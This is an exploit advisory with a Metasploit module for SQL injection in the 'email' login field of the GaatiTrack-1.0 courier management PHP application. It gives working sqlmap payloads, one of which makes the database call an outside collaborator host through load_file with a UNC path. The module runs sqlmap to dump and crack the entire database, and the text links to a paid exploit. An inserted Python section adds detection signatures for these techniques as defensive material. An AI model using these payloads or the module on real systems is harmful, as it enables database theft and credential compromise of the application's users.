# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.mayurik.com/
# Software: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
The payload `'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'` was submitted in the `email` parameter.
This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: [email protected]'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION SELECT 5005) END))-- -&password=r5I!g0t!W9

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
---
```
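An added example, not part of the original advisory or module: a request-side check for the `email` field that rejects anything that is not a plain address and labels the technique by the markers visible in the sqlmap output above. The sample bodies, the placeholder host `collab.example` and the signature names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Strict allow-list for the field the advisory names. The real fix is a
# parameterised query; this only rejects and labels hostile input.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# One signature per technique in the sqlmap output (names are hypothetical).
SIGNATURES = {
    # load_file() called with a quoted path that starts with backslashes (UNC)
    "oob-load_file-unc": re.compile(r"load_file\s*\(\s*['\"]\\{2,}", re.I),
    # AND <n>=(SELECT ... comparison used by the boolean-based blind test
    "boolean-blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\(\s*select\b", re.I),
    # FLOOR(RAND(0)*2) duplicate-key trick used by the error-based test
    "error-floor-rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # SLEEP(<n>) used by the time-based blind test
    "time-sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
}

def inspect_login_body(body):
    """Decode a form-encoded login body and classify its `email` field."""
    fields = parse_qs(body, keep_blank_values=True)  # also undoes %xx and '+'
    email = fields.get("email", [""])[0]
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(email))
    return {"email_ok": bool(EMAIL_RE.fullmatch(email)), "hits": hits}

# Constructed sample bodies (placeholder host and credentials, not captured traffic).
SAMPLES = {
    "clean": "email=user%40example.com&password=x",
    "oob_time": r"email=u%40example.com'+(select load_file('\\\\collab.example\\okf'))+''"
                r" AND (SELECT 2855 FROM (SELECT(SLEEP(11)))a)-- b&password=x",
    "boolean": "email=u%40example.com' AND 3077=(SELECT (CASE WHEN (3077=3077)"
               " THEN 3077 ELSE 1 END))-- -&password=x",
    "error": "email=u%40example.com' AND (SELECT 5507 FROM(SELECT COUNT(*),"
             "CONCAT('q',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS"
             " GROUP BY x)a)-- c&password=x",
    "encoded": "email=u%40example.com%27%20AND%20(SELECT%201%20FROM%20"
               "(SELECT(SLEEP(11)))a)--%20b&password=x",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:9s} {inspect_login_body(body)}")
```

Binding `email` as a parameter in a prepared statement removes the injection itself; this check is for rejecting and triaging hostile requests at a gateway or in logged request bodies.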
[+]MSF exploit:
```rb
##
# gaati.rb
#
# Author: nu11secur1ty
# Description: gaati-sqli
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      'Name' => 'gaati',
      'Description' => 'gaati-sqli',
      'Author' => ['nu11secur1ty'],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from Burp)', '' ]),
        OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py', '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
      ]
    )
  end

  def run
    raw_request = datastore['RAW_REQUEST']
    sqlmap_path = datastore['SQLMAP_PATH'] || '/home/kali/sqlmap-nu11secur1ty/sqlmap.py'
    if raw_request.nil? || raw_request.empty?
      print_error("RAW_REQUEST is empty — will attempt to use system exploit.txt if present.")
    end
    # Prefer system exploit.txt in MSF module dir (no need to cat)
    system_exploit = '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
    use_file = nil
    if File.exist?(system_exploit)
      use_file = system_exploit
      print_good("Using existing exploit file: #{use_file}")
    else
      # fallback: write to user-writable home dir
      exploit_dir = File.join(Dir.home, ".msf_exploits")
      Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
      timestamp = Time.now.strftime("%Y%m%d%H%M%S")
      tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")
      if raw_request.nil? || raw_request.empty?
        print_error("No RAW_REQUEST provided and no system exploit.txt found — nothing to do.")
        return
      end
      begin
        File.open(tmp_file, "w") { |f| f.write(raw_request) }
        print_good("Saved RAW_REQUEST -> #{tmp_file}")
        use_file = tmp_file
      rescue Errno::EACCES => e
        print_error("Cannot write temp exploit file: #{e}")
        return
      rescue => e
        print_error("Failed to save temp request: #{e}")
        return
      end
    end
    unless File.exist?(sqlmap_path)
      print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH option to correct path.")
      # do not delete the temp file so user can inspect
      return
    end
    sqlmap_cmd = [
      "python3",
      sqlmap_path,
      "-r", use_file,
      "--no-cast",
      "--no-escape",
      "--dbms=mysql",
      "--time-sec=11",
      "--random-agent",
      "--level=5",
      "--risk=3",
      "--batch",
      "--flush-session",
      "--technique=TBEUSQ",
      "--union-char=UCHAR",
      '--answers="crack=Y,dict=Y,continue=Y,quit=N"',
      "--dump-all"
    ].join(" ")
    print_status("Executing sqlmap: #{sqlmap_cmd}")
    begin
      system(sqlmap_cmd)
      print_good("sqlmap finished (check output above)")
    rescue => e
      print_error("Failed to execute sqlmap: #{e}")
    ensure
      # delete tmp file if we created it
      if use_file != system_exploit
        begin
          File.delete(use_file) if File.exist?(use_file)
          print_status("Deleted temporary file #{use_file}")
        rescue => e
          print_warning("Could not delete temporary file: #{e}")
        end
      end
    end
  end
end
```
# Reproduce:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Buy an exploit only:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>